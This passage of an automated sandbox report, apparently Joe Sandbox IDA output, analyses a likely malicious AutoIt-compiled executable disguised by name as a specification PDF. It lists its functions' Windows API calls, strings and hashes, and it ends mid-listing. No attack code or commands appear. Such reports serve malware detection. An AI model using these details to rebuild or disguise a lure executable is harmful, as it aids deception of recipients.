                                        • Part of subcall function 003AD575: GetWindowLongW.USER32(00000000,000000F0), ref: 003AD670
                                        • Part of subcall function 003AD575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 003AD698
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                      • String ID:
                                      • API String ID: 3521893082-0
                                      • Opcode ID: 7c24b2763072cdcbf3bc83756ce25bba5eb82282ccb12b22b9094b81f37d0e7f
                                      • Instruction ID: 2a08d7f8bdd0023a7b5e55fee49ffd43d5aac24c666b6d9dc73d57ae658323d2
                                      • Opcode Fuzzy Hash: 7c24b2763072cdcbf3bc83756ce25bba5eb82282ccb12b22b9094b81f37d0e7f
                                      • Instruction Fuzzy Hash: E2915E71408301BFDB129F64DC48E6BBBADFB8A325F100A29F962D65E0D771E944CB52
                                      Function 0035B8FD Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 491windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • DestroyWindow.USER32 ref: 0035B98B
                                      • DeleteObject.GDI32(00000000), ref: 0035B9CD
                                      • DeleteObject.GDI32(00000000), ref: 0035B9D8
                                      • DestroyIcon.USER32(00000000), ref: 0035B9E3
                                      • DestroyWindow.USER32(00000000), ref: 0035B9EE
                                      • SendMessageW.USER32(?,00001308,?,00000000), ref: 003BD2AA
                                      • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 003BD2E3
                                      • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 003BD711
                                        • Part of subcall function 0035B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0035B759,?,00000000,?,?,?,?,0035B72B,00000000,?), ref: 0035BA58
                                      • SendMessageW.USER32 ref: 003BD758
                                      • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 003BD76F
                                      • ImageList_Destroy.COMCTL32(00000000), ref: 003BD785
                                      • ImageList_Destroy.COMCTL32(00000000), ref: 003BD790
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                      • String ID: 0
                                      • API String ID: 464785882-4108050209
                                      • Opcode ID: 358728c1a17285edebbd54a39650f17d6a2c3796e3e799081e61e3e33c679f46
                                      • Instruction ID: 02220358ca7dfa75f05fd2246a56ad2e17666b41c9b5887f96d1e26fc11f5668
                                      • Opcode Fuzzy Hash: 358728c1a17285edebbd54a39650f17d6a2c3796e3e799081e61e3e33c679f46
                                      • Instruction Fuzzy Hash: 09129C34204201DFDB26CF28C884FA9BBE5FF45309F554569FA89CBA62DB31E845CB91
                                      Function 0038DBC4 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 187COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetErrorMode.KERNEL32(00000001), ref: 0038DBD6
                                      • GetDriveTypeW.KERNEL32(?,003DDC54,?,\\.\,003DDC00), ref: 0038DCC3
                                      • SetErrorMode.KERNEL32(00000000,003DDC54,?,\\.\,003DDC00), ref: 0038DE29
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: ErrorMode$DriveType
                                      • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                      • API String ID: 2907320926-4222207086
                                      • Opcode ID: 9912ca1aa313036f64d337dd5c83fb8e4cc6f5c1e546277dcdc2ea451e5b9334
                                      • Instruction ID: cf7f2e8e7e5f194033834595aa27f857ab3fb6b08c41a637c32d044737ca2b00
                                      • Opcode Fuzzy Hash: 9912ca1aa313036f64d337dd5c83fb8e4cc6f5c1e546277dcdc2ea451e5b9334
                                      • Instruction Fuzzy Hash: 2B519F30248306AB8613FF11C8A28B9B7A4FF94701F24599AF5079F6E5DB60ED49DB42
                                      Function 003AC6E9 Relevance: 42.4, APIs: 23, Strings: 1, Instructions: 447windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 003AC788
                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 003AC83E
                                      • SendMessageW.USER32(?,00001102,00000002,?), ref: 003AC859
                                      • SendMessageW.USER32(?,000000F1,?,00000000), ref: 003ACB15
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: MessageSend$Window
                                      • String ID: 0
                                      • API String ID: 2326795674-4108050209
                                      • Opcode ID: b6451e6790af14b94f1c4727e49705c40e6d22c6c3f3a7916c92c6912d29b9dc
                                      • Instruction ID: 884cee19c4fa45d3a0e2034a384e0eba9cdabb94728788721242db46a8e91ef2
                                      • Opcode Fuzzy Hash: b6451e6790af14b94f1c4727e49705c40e6d22c6c3f3a7916c92c6912d29b9dc
                                      • Instruction Fuzzy Hash: 3FF1E471114301AFD7278F28CC89BAABBE8FF4A314F04162DF599D62A1C775D845CBA1
                                      Function 003A638D Relevance: 42.4, APIs: 1, Strings: 23, Instructions: 352COMMON
                                      Download Yara Rule
                                      APIs
                                      • CharUpperBuffW.USER32(?,?,003DDC00), ref: 003A6449
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: BuffCharUpper
                                      • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                      • API String ID: 3964851224-45149045
                                      • Opcode ID: 2a00edc7ee960d881ad86e091d21f841186f5ba9f9ba23e34f7317b7603d7629
                                      • Instruction ID: 97e137ba21a01f43c48c4d887496b7afd8e5bb568f2194f96c877290e36e70e7
                                      • Opcode Fuzzy Hash: 2a00edc7ee960d881ad86e091d21f841186f5ba9f9ba23e34f7317b7603d7629
                                      • Instruction Fuzzy Hash: 4BC1A1342042158BCB17EF10C552E6EB7E9EF96344F094858F8965F2B2DB25EE4ACB42
                                      Function 003AD575 Relevance: 39.2, APIs: 26, Instructions: 186windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetSysColor.USER32(00000012), ref: 003AD5AE
                                      • SetTextColor.GDI32(?,?), ref: 003AD5B2
                                      • GetSysColorBrush.USER32(0000000F), ref: 003AD5C8
                                      • GetSysColor.USER32(0000000F), ref: 003AD5D3
                                      • CreateSolidBrush.GDI32(?), ref: 003AD5D8
                                      • GetSysColor.USER32(00000011), ref: 003AD5F0
                                      • CreatePen.GDI32(00000000,00000001,00743C00), ref: 003AD5FE
                                      • SelectObject.GDI32(?,00000000), ref: 003AD60F
                                      • SetBkColor.GDI32(?,00000000), ref: 003AD618
                                      • SelectObject.GDI32(?,?), ref: 003AD625
                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 003AD644
                                      • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 003AD65B
                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 003AD670
                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 003AD698
                                      • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 003AD6BF
                                      • InflateRect.USER32(?,000000FD,000000FD), ref: 003AD6DD
                                      • DrawFocusRect.USER32(?,?), ref: 003AD6E8
                                      • GetSysColor.USER32(00000011), ref: 003AD6F6
                                      • SetTextColor.GDI32(?,00000000), ref: 003AD6FE
                                      • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 003AD712
                                      • SelectObject.GDI32(?,003AD2A5), ref: 003AD729
                                      • DeleteObject.GDI32(?), ref: 003AD734
                                      • SelectObject.GDI32(?,?), ref: 003AD73A
                                      • DeleteObject.GDI32(?), ref: 003AD73F
                                      • SetTextColor.GDI32(?,?), ref: 003AD745
                                      • SetBkColor.GDI32(?,?), ref: 003AD74F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                      • String ID:
                                      • API String ID: 1996641542-0
                                      • Opcode ID: 80467e202baba4388c025a3d4b7dbf034d6c70715c9f6fb84dd0c28cc01fa7d2
                                      • Instruction ID: e4e454884cb07f9d8975261b7b2dd10c0ada7fcf2f02fe52f605fc84fc7606dc
                                      • Opcode Fuzzy Hash: 80467e202baba4388c025a3d4b7dbf034d6c70715c9f6fb84dd0c28cc01fa7d2
                                      • Instruction Fuzzy Hash: 44513B71900218AFDB129FA8DC48EAEBB79FB09324F154525F916EB2A1D771AA40CF50
                                      Function 00342EC0 Relevance: 37.1, APIs: 8, Strings: 13, Instructions: 346COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Window$Foreground
                                      • String ID: ACTIVE$ALL$CLASS$H+?$HANDLE$INSTANCE$L+?$LAST$P+?$REGEXPCLASS$REGEXPTITLE$T+?$TITLE
                                      • API String ID: 62970417-157867648
                                      • Opcode ID: 8d537ea4e3639331f2a0eb80ef36e9d252a45e35ea6ac9d22327d503bd479ada
                                      • Instruction ID: 1520f3261fa60d5f09bdcce4877ea6090edaf3b500b79eaf3a5036cb4ba45563
                                      • Opcode Fuzzy Hash: 8d537ea4e3639331f2a0eb80ef36e9d252a45e35ea6ac9d22327d503bd479ada
                                      • Instruction Fuzzy Hash: C0D184305086469BCB07EF10C4819EBBBF4BF54348F504A19F95A9F9A1DB30F99ACB91
                                      Function 003A764F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCursorPos.USER32(?), ref: 003A778A
                                      • GetDesktopWindow.USER32 ref: 003A779F
                                      • GetWindowRect.USER32(00000000), ref: 003A77A6
                                      • GetWindowLongW.USER32(?,000000F0), ref: 003A7808
                                      • DestroyWindow.USER32(?), ref: 003A7834
                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 003A785D
                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 003A787B
                                      • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 003A78A1
                                      • SendMessageW.USER32(?,00000421,?,?), ref: 003A78B6
                                      • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 003A78C9
                                      • IsWindowVisible.USER32(?), ref: 003A78E9
                                      • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 003A7904
                                      • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 003A7918
                                      • GetWindowRect.USER32(?,?), ref: 003A7930
                                      • MonitorFromPoint.USER32(?,?,00000002), ref: 003A7956
                                      • GetMonitorInfoW.USER32 ref: 003A7970
                                      • CopyRect.USER32(?,?), ref: 003A7987
                                      • SendMessageW.USER32(?,00000412,00000000), ref: 003A79F2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                      • String ID: ($0$tooltips_class32
                                      • API String ID: 698492251-4156429822
                                      • Opcode ID: f36bc88da0c808741a71d6111c04c7fb68f2d90915bd09b215abb230dc57b395
                                      • Instruction ID: 995399b566d8b35c13ad8fd5683c7981b9e473cb6e5471d01f55ed232eaaa833
                                      • Opcode Fuzzy Hash: f36bc88da0c808741a71d6111c04c7fb68f2d90915bd09b215abb230dc57b395
                                      • Instruction Fuzzy Hash: B1B18F71608300AFD706DF64CD89B6ABBE8FF89310F008A1DF5999B291D774E805CB91
                                      Function 003AB6C4 Relevance: 35.4, APIs: 19, Strings: 1, Instructions: 400windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 003AB7B0
                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 003AB7C1
                                      • CharNextW.USER32(0000014E), ref: 003AB7F0
                                      • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 003AB831
                                      • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 003AB847
                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 003AB858
                                      • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 003AB875
                                      • SetWindowTextW.USER32(?,0000014E), ref: 003AB8C7
                                      • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 003AB8DD
                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 003AB90E
                                      • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 003AB97C
                                      • SendMessageW.USER32 ref: 003ABA05
                                      • SendMessageW.USER32(?,00001074,?,00000001), ref: 003ABA5D
                                      • SendMessageW.USER32(?,0000133D,?,?), ref: 003ABB0A
                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 003ABB2C
                                      • GetMenuItemInfoW.USER32(?), ref: 003ABB76
                                      • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 003ABBA3
                                      • DrawMenuBar.USER32(?), ref: 003ABBB2
                                      • SetWindowTextW.USER32(?,0000014E), ref: 003ABBDA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: MessageSend$Menu$InfoItemTextWindow$CharDrawInvalidateNextRect
                                      • String ID: 0
                                      • API String ID: 1015379403-4108050209
                                      • Opcode ID: 3f1b41fa42325bec20087b11d9a8193d1c6038221292f809737f01b9707b3c80
                                      • Instruction ID: 714feefb2316ca498c89e77c9f122541ea27b82f197cedc9d0a6462d59663963
                                      • Opcode Fuzzy Hash: 3f1b41fa42325bec20087b11d9a8193d1c6038221292f809737f01b9707b3c80
                                      • Instruction Fuzzy Hash: 24E1A071900218AFDF129FA5CC84EEEBB7CFF06714F10816AF919AA192D7759A41CF60
                                      Function 0035A856 Relevance: 35.3, APIs: 18, Strings: 2, Instructions: 285windowtimeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0035A939
                                      • GetSystemMetrics.USER32(00000007), ref: 0035A941
                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0035A96C
                                      • GetSystemMetrics.USER32(00000008), ref: 0035A974
                                      • GetSystemMetrics.USER32(00000004), ref: 0035A999
                                      • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 0035A9B6
                                      • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 0035A9C6
                                      • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0035A9F9
                                      • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 0035AA0D
                                      • GetClientRect.USER32(00000000,000000FF), ref: 0035AA2B
                                      • GetStockObject.GDI32(00000011), ref: 0035AA47
                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 0035AA52
                                        • Part of subcall function 0035B63C: GetCursorPos.USER32(000000FF), ref: 0035B64F
                                        • Part of subcall function 0035B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0035B66C
                                        • Part of subcall function 0035B63C: GetAsyncKeyState.USER32(00000001), ref: 0035B691
                                        • Part of subcall function 0035B63C: GetAsyncKeyState.USER32(00000002), ref: 0035B69F
                                      • SetTimer.USER32(00000000,00000000,00000028,0035AB87), ref: 0035AA79
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                      • String ID: AutoIt v3 GUI$T.?
                                      • API String ID: 1458621304-528744971
                                      • Opcode ID: 9070007c45f26d3d5cfdf786a4cf5899bab599345bcc4b0abb1dfe668013abf3
                                      • Instruction ID: e7f06b4c6e7486d52aa2978f913bdd9ebaff8b7947ac020ab25c0cfee2af9d8f
                                      • Opcode Fuzzy Hash: 9070007c45f26d3d5cfdf786a4cf5899bab599345bcc4b0abb1dfe668013abf3
                                      • Instruction Fuzzy Hash: E5B16A71A0020A9FDB16DFA8DD45FEE7BA8EB08315F114229FA15E72A0DB74E840CB55
                                      Function 003A3639 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003A3735
                                      • RegCreateKeyExW.ADVAPI32(?,?,00000000,003DDC00,00000000,?,00000000,?,?), ref: 003A37A3
                                      • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 003A37EB
                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 003A3874
                                      • RegCloseKey.ADVAPI32(?), ref: 003A3B94
                                      • RegCloseKey.ADVAPI32(00000000), ref: 003A3BA1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Close$ConnectCreateRegistryValue
                                      • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                      • API String ID: 536824911-966354055
                                      • Opcode ID: bd5aae281f0b7196d393df704db863b5cb34a668ca3e417cb6cd402fa8a72d74
                                      • Instruction ID: 857f2c6de29c17f4b0d71bdc74fd1da7883173eb41765f74bcab4562785143ad
                                      • Opcode Fuzzy Hash: bd5aae281f0b7196d393df704db863b5cb34a668ca3e417cb6cd402fa8a72d74
                                      • Instruction Fuzzy Hash: A80237756046019FCB16EF14C851E2AB7E9FF8A720F05845DF99A9F2A2CB30ED01CB81
                                      Function 003A6BC9 Relevance: 26.5, APIs: 2, Strings: 13, Instructions: 281windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CharUpperBuffW.USER32(?,?), ref: 003A6C56
                                      • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 003A6D16
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: BuffCharMessageSendUpper
                                      • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                      • API String ID: 3974292440-719923060
                                      • Opcode ID: 3d2b1a2dcb23c18d39a81a753d57928218851f9e0b28f015ff7caa1bbf05b776
                                      • Instruction ID: c44d1d38829a9b567b955afdf4672e5f4c6d849eec5010892bdb2cd9dc6cd4ea
                                      • Opcode Fuzzy Hash: 3d2b1a2dcb23c18d39a81a753d57928218851f9e0b28f015ff7caa1bbf05b776
                                      • Instruction Fuzzy Hash: AEA17D342042419FCB16EF20C952E6BB3A5EF45354F148969F9969F3A2DB70ED09CB41
                                      Function 0037EA9D Relevance: 25.7, APIs: 17, Instructions: 168windowtimeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadIconW.USER32(00000063), ref: 0037EAB0
                                      • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0037EAC2
                                      • SetWindowTextW.USER32(?,?), ref: 0037EAD9
                                      • GetDlgItem.USER32(?,000003EA), ref: 0037EAEE
                                      • SetWindowTextW.USER32(00000000,?), ref: 0037EAF4
                                      • GetDlgItem.USER32(?,000003E9), ref: 0037EB04
                                      • SetWindowTextW.USER32(00000000,?), ref: 0037EB0A
                                      • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0037EB2B
                                      • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0037EB45
